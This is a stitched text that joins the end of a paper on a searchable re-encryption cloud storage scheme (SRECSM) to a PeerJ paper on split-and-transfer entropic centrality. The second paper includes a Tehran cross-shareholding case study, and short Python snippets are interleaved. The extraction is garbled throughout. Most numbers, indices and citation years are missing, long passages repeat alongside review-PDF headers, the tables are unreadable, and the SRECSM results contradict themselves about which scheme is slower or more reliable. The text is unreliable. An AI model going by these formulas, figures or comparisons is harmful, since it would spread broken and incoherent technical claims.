From these test data it can be concluded that the time spent on encryption or decryption with SRECSM is largely independent of the file type. The time comparison between SRECSM encryption and re-encryption is shown in the corresponding figure (time comparison on SRECSM encryption and re-encryption); there is little difference between the encryption time and the re-encryption time.

When files of the same size are encrypted with the different algorithms (CRES, the cloud-based re-encryption scheme; MRES, the manager-based re-encryption scheme; and SRECSM), the re-encryption times differ, as shown in Table VI and in the corresponding figure (comparison of re-encryption time), with a single fixed-size file used as the test case.

Table VI. Re-encryption time comparison for the different algorithms
  Columns: file size (MB); MRES re-encryption (ms); CRES re-encryption (ms); SRECSM re-encryption (ms).

In the SRECSM proposed in this paper the encryption and decryption times are relatively short, so file transfer has little impact on the total time loss and on the user experience. Encrypting files with CRES may take a relatively long time, which causes a significant additional time overhead for HDFS; the encryption time of MRES, however, was not significantly higher than that of SRECSM. Besides the impact on the overall transmission rate, the impact of encryption and decryption on mobile performance is also important (a minimal timing sketch is given below). In the next experiment we compared the searching time, the searching efficiency and the storage space while performing the encryption and re-encryption operations.

The figure comparing storage space against the number of keywords shows that, as the number of keywords increases, more storage space is required: the existing algorithms CRES and MRES require more storage space, whereas the proposed searchable re-encryption cloud storage method (SRECSM) reduces the storage-space requirement and utilises the data transfer effectively.

The figure comparing searching time against the number of keywords shows that, as the number of keywords increases, the searching time also increases. The previous techniques CRES and MRES need more searching time, while SRECSM takes less time to search the data: if the searched word does not match, SRECSM immediately applies the editing cases, and through these different cases the proposed SRECSM decreases the searching time.

MRES, CRES and SRECSM offload the re-encryption operations to the cloud, so in this experiment we also examined the turnaround time and the energy consumption on the cloud while performing the re-encryption operations; the experimental results are shown in the corresponding figure (comparison while performing re-encryption and decryption).
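The following is a minimal timing harness, using a stand-in XOR stream transformation rather than the paper's cipher, that illustrates how per-file-size encryption times of the kind reported in Table V can be collected; the file sizes and the key length are arbitrary.

```python
# Minimal timing harness: measure how long a stand-in "encryption"
# (a simple XOR stream, NOT the SRECSM scheme) takes per file size.
import os
import time

def xor_encrypt(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

key = os.urandom(32)
for size_mb in (1, 2, 4):
    data = os.urandom(size_mb * 1024 * 1024)
    t0 = time.perf_counter()
    xor_encrypt(data, key)
    elapsed_ms = (time.perf_counter() - t0) * 1000
    print(f"{size_mb} MB: {elapsed_ms:.1f} ms")
```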
It can be observed from panels (a) and (b) of the figure that increasing the file size increases the turnaround time and the energy consumption for completing the re-encryption operations on the mobile device; the increase is due to the larger number of re-encryption operations as the number of files grows. Panels (c) and (d) show that increasing the file size likewise increases the turnaround time and the energy consumption for completing the decryption operations on the mobile device, the increase being due to the larger number of decryption operations as the size of the files grows.

Using the reliability model of the cloud storage system proposed in the security analysis, combined with the time required to process files of the same size in Table IV under the different algorithms (CRES, MRES and SRECSM), the encryption time required to encrypt a file is first inverted and then normalised to obtain a_j; in the same way, the normalised storage cost a_k is obtained. If both a_j and a_k are close to one and the number of storage states in the cloud storage system is large, then the reliability of the system is high. Following this analysis, the data over one hour are sampled continuously and combined with the data of Tables IV and V, and the reliability contrast diagram for SRECSM is shown in the corresponding figure (reliability contrast diagram).

The reliability of the system under the different algorithms can be read from this figure. With CRES re-encryption the reliability values are almost maintained at one, so the reliability of the system is relatively high; that is, CRES re-encryption has little impact on file transfer and on the user experience. Re-encrypting files with MRES may take a relatively long time and its reliability fluctuates strongly, which shows that the reliability obtained with MRES re-encryption is low. The re-encryption time of SRECSM, however, is not significantly increased compared with CRES, and its reliability is consistent with that of CRES, being maintained around one; it is therefore concluded that the system is relatively reliable when SRECSM encryption is used. These simulation experiments verify that SRECSM offers a good user experience and that the mechanism of SRECSM effectively improves the efficiency of the cloud storage: when a mobile terminal makes a request, the optimal node is selected and time is saved effectively.

In the SRECSM presented in this paper, the re-encryption and decryption have the following characteristics. The transport security and the storage security of the user data are guaranteed. The mobile device finishes the re-encryption before calculating the checksum, so the re-encryption does not break the HDFS data integrity check mechanism. In the entire distributed file storage system, the re-encryption and decryption are scattered across the various mobile devices; while this causes some performance loss on the mobile devices, there is no additional performance penalty for the name node and the data nodes.

VI. Conclusions and Future Work

CRES and MRES re-encrypt the keyword for safe transmission, but these two schemes are more complex and need more time to re-encrypt. To optimise the cloud storage and the safety of transmission, and to minimise the cost and the searching time, we have proposed a new scheme, the searchable re-encrypted data storage SRECSM.
This proposed searchable re-encryption method supports periodical and secure prediction by using the staged steady-state Markov strategy and determines the lowest storage cost. SRECSM improves flexibility while reducing the storage requirement, the security issues, the overhead ratio, the cost and the searching time. The Markov-chain-based SRECSM proposed in this paper is shown to have high reliability through a series of simulation experiments. The comparison graphs evaluate the turnaround time and the energy consumption for different file sizes: as the file size increases, the proposed SRECSM still achieves accurate predictions, reduces the storage-space requirement and the re-encryption time, and schedules the data to be stored on the node with the lowest storage cost. We finally conclude that the scheme proposed in this paper has better security and reliability, and that SRECSM reduces the storage-space requirement, the security issues and the searching time while increasing the searching efficiency.

Acknowledgment

Foundation items: the Industrial Research Project of the Science and Technology Department of Shaanxi Province; the Laboratory Fund of Xi'an Technological University.
A Split-and-Transfer Flow Based Entropic Centrality

Frédérique Oggier, Silivanxay Phetsouvanh and Anwitaman Datta (corresponding author: Anwitaman Datta)
Division of Mathematical Sciences, Nanyang Technological University, Singapore; School of Computer Science and Engineering, Nanyang Technological University, Singapore. These authors contributed equally to this work.

Abstract. The notion of entropic centrality measures how central a node is in terms of how uncertain the destination of a flow starting at this node is: the more uncertain the destination, the more well connected and thus central the node is deemed. This implicitly assumes that the flow is indivisible, and that at every node the flow is transferred from one edge to another. The contribution of this paper is to propose a split-and-transfer flow model for entropic centrality, where at every node the flow can actually be arbitrarily split across choices of neighbours. We show how to map this to an equivalent transfer entropic centrality set-up for ease of computation, and carry out three case studies (an airport network, a cross-shareholding network and a Bitcoin transactions subnetwork) to illustrate the interpretation and insights linked to this new notion of centrality.

Subjects: Data Mining and Machine Learning, Data Science. Keywords: entropy, centrality, information flow.

Introduction

Centrality is a classical measure used in graph theory and network analysis to identify important vertices. The meaning of "important" depends on the nature of the problem analysed, e.g., hubs in networks, spreaders of a disease, or influencers in social networks. Commonly used centrality measures include: the degree centrality, which is the degree (or in-degree/out-degree) of the vertex depending on whether the graph is directed, possibly normalised to give the fraction of vertices a given vertex is connected to; the closeness centrality, which is the reciprocal of the sum of the shortest-path distances from a given vertex to all others, typically normalised, and which indicates how close a given vertex is to all other vertices in the network; and the betweenness centrality, which is the sum of the fractions of all pairs of shortest paths that pass through the vertex, indicating the extent to which it stands between other vertex pairs (see, e.g., Estrada for a survey of different centrality measures and of how centralities fit into the more general framework of complex networks).
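As a quick illustration of the standard measures just listed, the following minimal example (assuming the networkx package, which is not used by the paper itself) computes them on a small hypothetical digraph.

```python
# Minimal illustration of the standard centrality measures on a toy digraph.
import networkx as nx

G = nx.DiGraph([("a", "b"), ("a", "c"), ("b", "d"), ("c", "d"), ("d", "e")])

print(nx.out_degree_centrality(G))   # fraction of vertices each vertex points to
print(nx.closeness_centrality(G))    # reciprocal of summed shortest-path distances
print(nx.betweenness_centrality(G))  # fraction of shortest paths passing through
print(nx.pagerank(G))                # random-surfer importance
```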
These measures were extended to weighted graphs, though at the risk of changing the interpretation of the measure; e.g., one may use weighted degrees instead of degrees, but this measure no longer counts the number of neighbours (see, e.g., Opsahl, Agneessens & Skvoretz for a discussion on using the above-cited centrality measures for weighted graphs). Another way to determine centrality is to assign as centrality a (scaled) average of the centralities of the neighbours. This is the idea behind the eigenvector centrality discussed by Newman, which was already debated by Bonacich, who later generalised it to alpha centrality (Bonacich & Lloyd). Alpha centrality introduces an additive exogenous term, which accounts for an influencing factor that does not depend on the network structure. Though Katz centrality (Katz) relies on the idea that importance is measured by weighted numbers of walks from the vertex in question to other vertices (where longer walks have less weight than short ones), it turns out that alpha centrality and Katz centrality differ by a constant term. With these three centralities, a highly central vertex with many links tends to endorse all its neighbours, which in turn become highly central. However, one could argue that the inherited centrality should be diluted if the central vertex is too magnanimous, in the sense that it has too many neighbours. This is solved by PageRank centrality, which is based on the PageRank algorithm developed by Page et al. Iannelli & Mariani proposed ViralRank as a new centrality measure, defined as the average random-walk effective distance to and from all the other nodes in the network; this measure is meant to identify influencers for global contagion processes. Benzi & Klymko showed that a parameterised random-walk model can capture the behaviour of a gamut of centrality measures, including degree centrality (walks of length one) and eigenvector-based centrality models (considered as infinite walks), which contain the eigenvector and Katz centralities as particular cases. This parameterised model helps explain and interpret the high rank correlation observed among degree centrality and eigenvector-based centralities. Schoch, Valente & Brandes argue that the role of the network structure itself should not be underestimated when looking at correlations among centralities. Notwithstanding this high rank correlation among centrality measures, each measure captures vertex importance subject to a certain interpretation of importance, which is a key rationale behind studying different centrality models in different contexts.
A seminal work by Borgatti looked at which notion of centrality is best suited to a given scenario, by characterising the scenario as a flow circulating over a network: a typology of the flow process is given across two dimensions, the type of circulation (parallel/serial duplication, transfer) and the flow trajectories (geodesics, paths, trails, or walks). A flow may be based on transfer, where an item or unit flows in an indivisible manner (e.g., package delivery), or on serial replication, in which both the node that sends the item and the one that receives it have the item (e.g., one-to-one gossip), or on parallel duplication, where an item can be transmitted in parallel through all outgoing edges (e.g., epidemic spread). It was shown for example that betweenness is best suited for geodesics and transfer, while eigenvector-based centralities should be used for walks and parallel duplication. Indeed, betweenness is based on shortest paths, suggesting a target to be reached as fast as possible, and thus fitting transfer; using Katz's intuition, eigenvector-based centralities count possible unconstrained walks, and they are consistent with a scenario where every vertex influences all of its neighbours simultaneously, which fits parallel duplication. This flow characterisation is of interest for this work, since we will be looking at a case where a flow is not just transferred, but also split among outgoing edges, with the possibility of partly remaining at any node it encounters. This scenario could typically be motivated by
to do so, we first interpret the ‘‘transfer’’ centrality proposed in tutzauer ( ) as having ( ) an underlying graph, where every edge has a probability which is that of being chosen uniformly at random among the other outgoing edges of a given vertex, and ( ) an indivisible flow which starts at a vertex u, and follows some path where the probability to choose an edge at every vertex in this path is given by the probability attached to this edge, taking into account unvisited neighbors, to reach v. since the flow is indivisible, the self-loop represents the probability for this flow to stop at a given vertex. in our generalization, we similarly assume that we have ( ) an underlying graph, only now the probability attached to each edge depends on the scenario considered and could be arbitrary, ( ) the flow used to measure centrality can split among neighbors, by specifying which subsets it goes to with which probability, at every vertex it encounters (as per a flow in the traditional network analysis sense, flow conservation applies, meaning that the amount of flow that goes out of u is the same amount of flow that reaches all of its neighbors). again, a self-loop is an artifact introduced to capture the effect of the flow on vertices, even if none of the flow actually remains in the vertex (as in nikolaev, razib & kucheriya, , a zero probability would otherwise render zero contribution to the entropic centrality calculation). while the underlying phenomenon may have self-loops, they may or not be directly used to determine the self-loops needed for the mathematical model. this should be determined based on the scenario being modeled. the above motivates the notion of a split-and-transfer entropic centrality. since propagation of flow is an indicator of spread over the network, we will also consider a scaled oggier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. version of entropic centrality, where a multiplicative factor is introduced to incorporate additional information, which may suggest an a priori difference of importance among the vertices, for instance, if the data suggests that some vertices handle volume of goods much larger than other vertices. the contributions of this work are to ( ) introduce the above framework for split-and- transfer entropic centrality, ( ) show in ‘the transfer entropic centrality’ that transfer centrality can be easily extended to consider arbitrary probabilities on graph edges and ( ) prove that computing the split-and-transfer entropic centrality can be reduced to transfer entropic centrality over a graph with suitable equivalent edge probabilities (which is crucial from a practicality perspective), as shown in proposition of ‘the transfer entropic centrality’. studies that showcase and explore our technique are provided in ‘case studies’: (i) a cross-shareholding network representing portfolio diversification, that illustrates the versatility of our framework (ii) a subgraph of wallet addresses from the bitcoin network, which originally motivated the study of split-and-transfer flows, and (iii) an airport network. comparisons with other standard centralities (alpha, katz, betweenness and pagerank) are given, showing that the entropic centrality captures different features. the notion of split-and-transfer entropic centrality the transfer entropic centrality consider the network shown on fig. 
a and assume that the probability of an indivisible flow going from one vertex to another is uniform at random (including the option to remain at the current vertex). for a flow starting at v , there is then a probability to go to v , and a probability to continue to v , so the probability to go from v to v following the path (v ,v ,v ) is . but since it is also possible to reach v from v using v instead, an event of probability , we have that the probability pv ,v for an indivisible flow to start at v and stop at v is pv ,v = . similarly, we compute pv ,v ,pv ,v ,pv ,v and pv ,v , and the transfer entropic centrality ch(u) of u=v is ch(v )= log + log ( )= . by ( ). for a point of comparison, on the right of the same figure, we change the probability to go out of v , such that the edge (v ,v ) is chosen with a probability , while the probability is for using the edges to the other vertices (including a probability that the flow just stays at v itself). the resulting probabilities are provided on fig. b. there is no complication in computing ch(v ) using ( ) with non-uniform probabilities. this reduces slightly the centrality of v , which is consistent with the interpretation of entropic centrality: the underlying notion of entropy is a measure of uncertainty (tutzauer, ), the uncertainty of the final destination of a flow, knowing that it started at a given vertex. imagine the most extreme case where the edge (v ,v ) is chosen with a probability , then even though v has three potential outgoing neighbors, two of them are used with probability , so the centrality of v would reduce considerably, as expected, since there is no uncertainty left regarding the destination of a flow at v . the notion of transfer entropic centrality captured by ( ) assumes that there is no vertex repetition in the paths taken by the flow. figure illustrates this hypothesis. again for oggier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. v v v v v pv ,v = pv ,v = pv ,v = pv ,v = pv ,v = ch(v ) = . . (a) v v v v v pv ,v = pv ,v = pv ,v = pv ,v = pv ,v = ch(v ) ≈ . . (b) figure . the transfer entropic centrality ch(v ) of v is computed using ( ), for a uniform edge distribution (the choice of an edge at a given vertex is chosen uniformly at random among choices of unvisited neighbors) in ( a), and for a non-uniform distribution in ( b). reaches all of its neighbors). again, a self-loop is an artifact introduced to capture the effect of the flow on vertices, even if none of the flow actually remains in the vertex (as in (nikolaev et al. ( )), a zero probability would otherwise render zero contribution to the entropic centrality calculation). while the underlying phenomenon may have self-loops, they may or not be directly used to determine the self-loops needed for the mathematical model. this should be determined based on the scenario being modeled. the above motivates the notion of a split-and-transfer entropic centrality. since propagation of flow is an indicator of spread over the network, we will also consider a scaled version of entropic centrality, where a multiplicative factor is introduced to incorporate additional information, which may suggest an a priori difference of importance among the vertices, for instance, if the data suggests that some vertices handle volume of goods much larger than other vertices. the contributions of this work are to ( ) introduce the above framework for split-and-transfer entropic centrality, ( ) show in subsection . 
that transfer centrality can be easily extended to consider arbitrary probabilities on graph edges and ( ) prove that computing the split-and-transfer entropic centrality can be reduced to transfer entropic centrality over a graph with suitable equivalent edge probabilities (which is crucial from a practicality perspective), as shown in proposition of subsection . . studies that showcase and explore our technique are provided in section : (i) a cross-shareholding network representing portfolio diversification, that illustrates the versatility of our framework (ii) a subgraph of wallet addresses from the bitcoin network, which originally motivated the study of split-and-transfer flows, and (iii) an airport network. comparisons with other standard centralities (alpha, katz, betweenness and pagerank) are given, showing that the entropic centrality captures different features. the notion of split-and-transfer entropic centrality . the transfer entropic centrality consider the network shown on figure a and assume that the probability of an indivisible flow going from one vertex to another is uniform at random (including the option to remain at the current vertex). for a flow starting at v , there is then a probability to go to v , and a probability to continue to v , so the probability to go from v to v following the path (v ,v ,v ) is . but since it is also possible to reach v from v using v instead, an event of probability , we have that the probability pv ,v for an indivisible flow to start at v and stop at v is pv ,v = . similarly, we compute pv ,v , pv ,v , pv ,v and pv ,v , and the transfer entropic centrality ch(u) of u = v is ch(v ) = log + log ( ) = . by ( ). for a point of comparison, on the right of the same figure, we change the probability to go out of v , such that the edge (v ,v ) is chosen with a probability , while the probability is for using the edges to the other vertices (including a probability that the flow just stays at v itself). the resulting probabilities are provided on figure b. there is no complication in computing ch(v ) using ( ) with non-uniform probabilities. this reduces slightly the centrality of v , which is consistent with the interpretation of / peerj comput. sci. reviewing pdf | (cs- : : : : :new aug ) manuscript to be reviewedcomputer science figure the transfer entropic centrality ch (v ) of v is computed using ( ), for a uniform edge distri- bution (the choice of an edge at a given vertex is chosen uniformly at random among choices of unvis- ited neighbors) in (a), and for a non-uniform distribution in (b). full-size doi: . /peerjcs. /fig- v v v v v pv ,v = pv ,v = pv ,v = pv ,v = pv ,v = ch(v ) = . . (a) v v v v v pv ,v = pv ,v = pv ,v = pv ,v = pv ,v = + ch(v ) ≈ . . (b) figure . an example of transfer centrality involving already visited neighbors. if probabilities are uniform at random ( a), they are scaled according to the number of unvisited neighbors. if not ( b), they are scaled proportionally to the existing probabilities. entropic centrality: the underlying notion of entropy is a measure of uncertainty (tutzauer ( )), the uncertainty of the final destination of a flow, knowing that it started at a given vertex. imagine the most extreme case where the edge (v ,v ) is chosen with a probability , then even though v has three potential outgoing neighbors, two of them are used with probability , so the centrality of v would reduce considerably, as expected, since there is no uncertainty left regarding the destination of a flow at v . 
the notion of transfer entropic centrality captured by ( ) assumes that there is no vertex repetition in the paths taken by the flow. figure illustrates this hypothesis. again for the centrality of v , a flow leaves v , it can go to either v , v or v . when reaching v , the flow cannot go back to v , since v is already visited (and going back would not give a path anymore), there the probabilities to stay at v and to go to v from v are modified. on the left, when probabilities are uniform, since now only two outgoing edges of v are available, namely edges (v ,v ) and (v ,v ), each is assigned a probability of . on the right, when probabilities are not uniform, we distribute the probability of going to some visited vertex proportionally to the rest of the available edges. since is going to v while is staying at v , we have and out of respectively leaving and staying, thus obtaining the renormalized probabilities as + = and + = . the examples of figures and illustrate diverse cases of indivisible flow. by definition of indivis- ibility, the choice of an edge at a vertex u corresponds to choosing subsets containing one vertex only in the list of all subsets of neighbors. we can thus set a probability to all subsets which contain more than one vertex. therefore, the definition of entropic centrality in ( ), with or without uniform edge probabilities, are particular cases of the proposed split-and-transfer framework, that we discuss next. . the split-and-transfer entropic centrality consider the network of figure depicting a seller v whose direct customers are v ,v ,v . say we further know that when v distributes a new batch of items, he does so to either customers {v ,v } or {v ,v }, and in fact, the pair {v ,v } is preferred (they receive / of the batches, versus / for the group {v ,v }). furthermore, in the first case, v receives a higher volume than v (say / of the batch goes to v ), while for the second case, v takes / of the batch shared with v . once v ,v obtain the items, they typically keep half for themselves, and distribute the other half to v . to compute the centrality of v , we consider a divisible flow starting at u = v which can split among different paths instead of following one. to model the choice of splitting among possible neighbors, we first define a probability q(x) over the set eu = { {v }, {v }, {v }, {v }, {v ,v }, {v ,v }, {v ,v }, {v ,v }, {v ,v }, {v ,v }, {v ,v ,v }, {v ,v ,v }, {v ,v ,v }, {v ,v ,v }, {v ,v ,v ,v } } such that, for our example, q({v ,v }) = , q({v ,v }) = , and q(x) = for other choices of x (in contrast to (oggier et al. ( c)) where it was chosen to be uniformly at random). this represents the fact that / of the time, v sends the goods to the pair {v ,v } (as shown in figure a), while for the rest of the time, / peerj comput. sci. reviewing pdf | (cs- : : : : :new aug ) manuscript to be reviewedcomputer science figure an example of transfer centrality involving already visited neighbors. if probabilities are uni- form at random (a), they are scaled according to the number of unvisited neighbors. if not (b), they are scaled proportionally to the existing probabilities. full-size doi: . /peerjcs. /fig- the centrality of v , a flow leaves v , it can go to either v , v or v . when reaching v , the flow cannot go back to v , since v is already visited (and going back would not give a path anymore), there the probabilities to stay at v and to go to v from v are modified. oggier et al. ( ), peerj comput. sci., doi . /peerj-cs. 
it sends it to the pair {v ,v } (shown in figure b). we compute the path probabilities for each event, once for q({v ,v }) and once for q({v ,v }), accordingly. we have further information: when v deals with {v ,v }, there is a bias in favour of v compared to v , and there is a bias in favour of v in the other case. the corresponding probabilities are attached to the edges {(v ,v ),(v ,v )} and {(v ,v ),(v ,v )} respectively (shown in figure c). now that the edge probabilities are defined, we can compute the path probabilities: for example, from v to v , we sum up the path probabilities for both events, weighted by the respective event probability.

figure : an example of split-and-transfer entropic centrality: in (a), in red, the event corresponding to choosing {v ,v }; in (b), the event {v ,v }. the probabilities pu,v are computed by summing over both events, weighted by the respective event probability, from which ch(v ) follows.

we next provide a general formula. we let a flow start at a vertex whose centrality we wish to compute, and at some point of the propagation process, a part fu of the flow reaches u. let nu be the neighborhood of interest given fu, that is, the set of outgoing neighbors which have not yet been visited by the flow. every outgoing edge (u,v) of u corresponds exactly to some outgoing neighbor v, so in what follows, we may refer to either one or the other. let eu denote the set of possible outgoing edge subsets (where every edge (u,v) is represented by the neighbor v). we attach a possibly distinct probability q(x) to every choice x in eu, so that ∑_{x∈eu} q(x) = 1. every x in eu corresponds to a set of edges (u,v) for v a neighbor. we further attach a weight ωx(u,v) to every edge in x, with the constraint that ∑_{(u,v)∈x} ωx(u,v) = fu. for example, we could choose all edges with equal weight, that is ωx(u,v) = fu/i for every (u,v) in an x containing i edges, to instantiate the special case where the flow is uniformly split among all edges. for a given node u, we compute the expected flow from u to a chosen neighbor v. every such choice of x comes with a probability q(x), and every edge (u,v) in x has a weight ωx(u,v), which sums up to

fuv = ∑_{x∈eu,v} q(x) ωx(u,v),   ( )

where eu,v contains the sets in eu themselves containing v.

example . consider the running example, with u = v . the set of neighbors of u is nu = {u,v ,v ,v }. we assign a probability qi to every one of the subsets of nu, namely q({u}), q({v }), q({v }), q({v }), q({u,v }), q({u,v }), q({u,v }), q({v ,v }), q({v ,v }), q({v ,v }), q({u,v ,v }), q({u,v ,v }), q({u,v ,v }), q({v ,v ,v }) and q({u,v ,v ,v }), with ∑_i qi = 1. writing down explicitly the terms involved in the sum ( ) for a node v, fu,v collects the term q({v}) fu coming from the singleton {v} (for which the whole flow fu is assigned to the single edge (u,v)), plus one term q(x) ωx(u,v) for every subset x containing v together with other neighbors.

then fu,u + fu,v + fu,v + fu,v = fu ∑_i qi = fu. instantiating q and ω with the values of the running example (the two batch events and their respective splits), one obtains the expected flows fu,v for each of the three customers, which indeed sum to fu. we repeat the computations for fv ,v and fv ,v . for that, we need to know what fv and fv are, but in this case, since both v and v only have one incoming edge, we have that fv = fv ,v and fv = fv ,v , and fv is obtained by adding the two flows reaching it. it is true that by setting fu = 1, we have fu,v = pu,v as computed in figure , but this is a consequence of the particular value of pv ,v there. if we consider v instead, we find fu,v ≠ pu,v : this is because we have computed what reaches v , but since v has an outgoing edge, we need to distinguish what stays from what continues. notice that by setting fu = 1 (and fv , fv accordingly), we obtain the quantities fu,v , fu,v , fu,v , fv ,v and fv ,v , and we then assign to edge (vi,vj) the probability fvi,vj (with fu = 1), as reported on figure a. the property of flow conservation observed in the example holds true in general, which we shall prove next. indeed, when v varies in nu, the sets eu,v appearing in the summation ∑_{v∈nu} ∑_{x∈eu,v} q(x) ωx(u,v) may intersect, so for each choice x, one can gather all the eu,v that contain x. for this x, we find a term in the above sum of the form q(x) ∑_{(u,v)∈x} ωx(u,v) = q(x) fu. then ∑_{v∈nu} ∑_{x∈eu,v} q(x) ωx(u,v) = ∑_{x∈eu} q(x) fu = fu. this shows that the flow leaving u is conserved over all the neighbors v ∈ nu, given fu.
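a minimal python sketch of the expected-flow computation in ( ) may help here: it takes a subset distribution q and per-subset edge weights ω, returns the equivalent edge probabilities fuv, and checks flow conservation. the dictionaries below are illustrative stand-ins for the seller example (the fractions are assumed placeholder values, not values taken from the paper).

def equivalent_edge_probabilities(q, omega, f_u=1.0):
    """expected flow f_{u,v} sent to each neighbor v of u.
    q: dict mapping a frozenset of neighbors X to its probability q(X)
    omega: dict mapping (X, v) to the weight omega_X(u, v); for each X the
           weights sum to f_u."""
    f = {}
    for X, qx in q.items():
        for v in X:
            f[v] = f.get(v, 0.0) + qx * omega[(X, v)]
    return f

# assumed numbers: u sends to {v1, v2} three quarters of the time
# (three quarters of that batch going to v1), otherwise to {v1, v3}
q = {frozenset({"v1", "v2"}): 0.75, frozenset({"v1", "v3"}): 0.25}
omega = {(frozenset({"v1", "v2"}), "v1"): 0.75,
         (frozenset({"v1", "v2"}), "v2"): 0.25,
         (frozenset({"v1", "v3"}), "v1"): 1 / 3,
         (frozenset({"v1", "v3"}), "v3"): 2 / 3}
f = equivalent_edge_probabilities(q, omega)
print(f, sum(f.values()))  # flow conservation: the values sum to f_u = 1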
thus, by setting fu = 1, the quantity fuv = ∑_{x∈eu,v} q(x) ωx(u,v) becomes a probability, and in fact, putting this probability on the edge (u,v) in the context of the transfer entropic centrality gives the same result as the above computations using the split-and-transfer model, as already illustrated on the figure in example , since the probabilities displayed on the edges of the graph have been computed in this manner. we summarize what we computed in the proposition below.

proposition . the split-and-transfer entropic centrality ch,p(u) of a vertex u is given by ch,p(u) = − ∑_{v∈v} quv log(quv), where quv = ∑_{x∈eu,v} q(x) ωx(u,v) is computed from ( ) with fu = 1, and the usual convention that 0 · log 0 = 0 is assumed. the index p in ch,p emphasizes the dependency on the choice of the probability distribution p; when p is uniform we write ch,unif as a particular case.

we thus showed that the split-and-transfer entropic centrality is equivalent to a transfer entropic centrality, assuming the suitable computation of edge probabilities. the notion of split-and-transfer entropic centrality characterizes the spread of a flow starting at u through the graph. now two vertices may have the same spread, but one vertex may be dealing with an amount of goods much larger than the other. in order to capture the scale of a flow, we also propose a scaled version of the above entropy.

definition . the scaled split-and-transfer entropic centrality is accordingly given by f(fu) ch,p(u), where f is a scaling function.

as a corollary, the computational complexity of this centrality measure is the same as that of tutzauer ( ), namely that of a depth first search, i.e., o(|v| + |e|) (migliore, martorana & sciortino, ). when the graph becomes large and some probabilities become negligible, a natural heuristic of setting them to zero is used. the scaling function f may depend on the nature of the underlying real world phenomenon being modeled by the graph, with f(fu) = fu being a simple default choice (other standard choices are f(fu) = √fu or f(fu) = log(fu)). we use the default choice in the example below.

example . continuing with the same example, we use the edge probabilities as obtained in example to compute the transfer entropic centrality from definition . the scaled entropic centralities of u = v and of v are simply fu ch,p(v ) and fv ch,p(v ). without the scaling factor, ch,p is a measure of spread, and it makes sense that ch,p(v ) > ch,p(v ). however, if v is actually distributing some items in overall small amounts, while v is not only getting this item from v but also producing it, and furthermore sending it only to v but in large amounts, then the scaling factor could be used to refine the analysis and account for this extra information. from the moment fv exceeds fv by a sufficient factor, v will be deemed more important than v as per the scaled entropic centrality measure.

case studies

shareholding in tehran stock market

we next consider companies from the tehran stock market, as listed in appendix a of dastkhan & gharneh ( ); we thank the authors of dastkhan & gharneh ( ) for sharing their data with us. they form the vertices of a cross-shareholding network of companies which have shares of other companies. there is an edge between i and j if company i belongs to the investment portfolio of company j, i.e., j owns some share of i.
therefore the in-degree of node j is the number of companies that belong to the investment portfolio of company j. conversely, the out-degree of node j is the number of companies that are shareholders of j. edges are weighted, edge (i,j) has for weight the percentage of shares that company j has from company i. we will consider this graph, shown in fig. , and the graph with reverse edge directionality. nodes highlighted in green in fig. have one edge with weight more than . , meaning that more than % of their shares are owned by another company, otherwise they are in grey. nodes highlighted in vermillion, superseding the other coloring, have the highest in-degrees, which means that they own shares of many other companies. they are nodes oggier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure cross-shareholding network of tehran stock market companies: vermillion and sky blue nodes have respectively the highest in- and out-degrees. nodes circled in sky blue respectively vermillion have the highest entropic centrality under the current and reverse edge directionality. full-size doi: . /peerjcs. /fig- (adashare), (nikx ), (oilcopen), (sa a ), (tamin org), and (government). nodes highlighted in sky blue have the highest out-degrees, which means that their shares are owned by many other companies (but possibly in small amounts). they are nodes (bmex ), (ch ), (fo ), (gd ), (go ) with degree and (pfax ), (madn), (ms ) and (pk ) with degree . we next assign probabilities to edges: we use the edge weight, and fix the edge probability to be inversely proportional to its weight. self-loops have a natural interpretation. since the outgoing edges of node j indicate the companies that are shareholders of j, the self-loop refers to j still owning some of its own shares, and the amount is % minus what the other companies own (share ownerships with negligible amounts were not taken into account in the data set, so self-loops absorb these portions). table lists the seven nodes with the highest entropic centrality. the interpretation of entropic centrality here is that we are looking at the nodes whose shares are ‘‘most diversely owned’’ in terms of their shares being owned by different companies, whose shares are in turn themselves owned by others. the economic fortunes of the company whose centrality is looked at thus also affects those of the other companies, and the entropic centrality thus indicates the impact a particular company’s economic performance would have on the rest. we immediately see that this centrality measure is different from out-degree oggier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table vertices with the highest entropic centrality, their scaled entropic centrality, where fu is the market size in percentage (their relative ranking is marked with subscript), their out-degrees (in the above part) or in-degrees (in the below part, for the graph with reverse edge direc- tionality) and neighbors with the weight of the connecting edges. bold face indicates a high degree. ranks with respect to alpha/katz (ak) with α= , pagerank (pr) weighted (w) and unweighted (u), and betweenness (b). no id ch,p fu fuch,p out neighbors a/k pr(u/w) b (w) arfz . . . ( , . ), ( , . ), / / ( , . ), ( , . ) ( , . ), ( , . ) go . . . ( , . ),( , . ) / / ( , . ),( , . ) ( , . ), ( , . ) ( , . ) ipar . . . ( , . ),( , . ) / / ( , . ), ( , . ), ( , . ) prds . . . 
( , . ), ( , . ), / / ( , . ), ( , . ) ( , . ) pk a . . . ( , . ), ( , . ) / / knrx . . . ( , . ),( , . ) / / ( , . ) prsx . . . ( , . ), ( , . ) / / ( , . ), ( , . ) ( , . ), ( , . ) no id ch,p fu in neighbors gov . . ( , . ) tamin org . . ( , . ) adashare . . btej . . ( , . ) oilcopen . . tmel . . nikx . . centrality. we can however look at how they relate, by considering the role of out-degrees not only on the nodes but also on their neighbors. we observe that only node has one of the highest out-degrees, however, nodes and still have high out-degrees, but also are connected to neighbors which have high out-degrees, in fact, node which has the highest entropic centrality has three high out-degree neighbors. for nodes and , they still have a relatively high out-degree. for , it has a fairly low out-degree, but out of the neighbors, two have high degrees themselves. the case of node is particularly interesting, since it has only two neighbors, namely and . neither of nor has a high centrality individually, but they together provide node a conduit to a larger oggier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. subgraph than the individual transit nodes themselves do, illustrating the secondary effects of flow propagation. the cross-shareholding network of tehran stock market was analyzed in dastkhan & gharneh ( ), where a closeness centrality ranking is shown to be almost identical to the degree based centrality one. the entropic centrality ranking in contrast manages to capture a different dynamics, by involving the spread 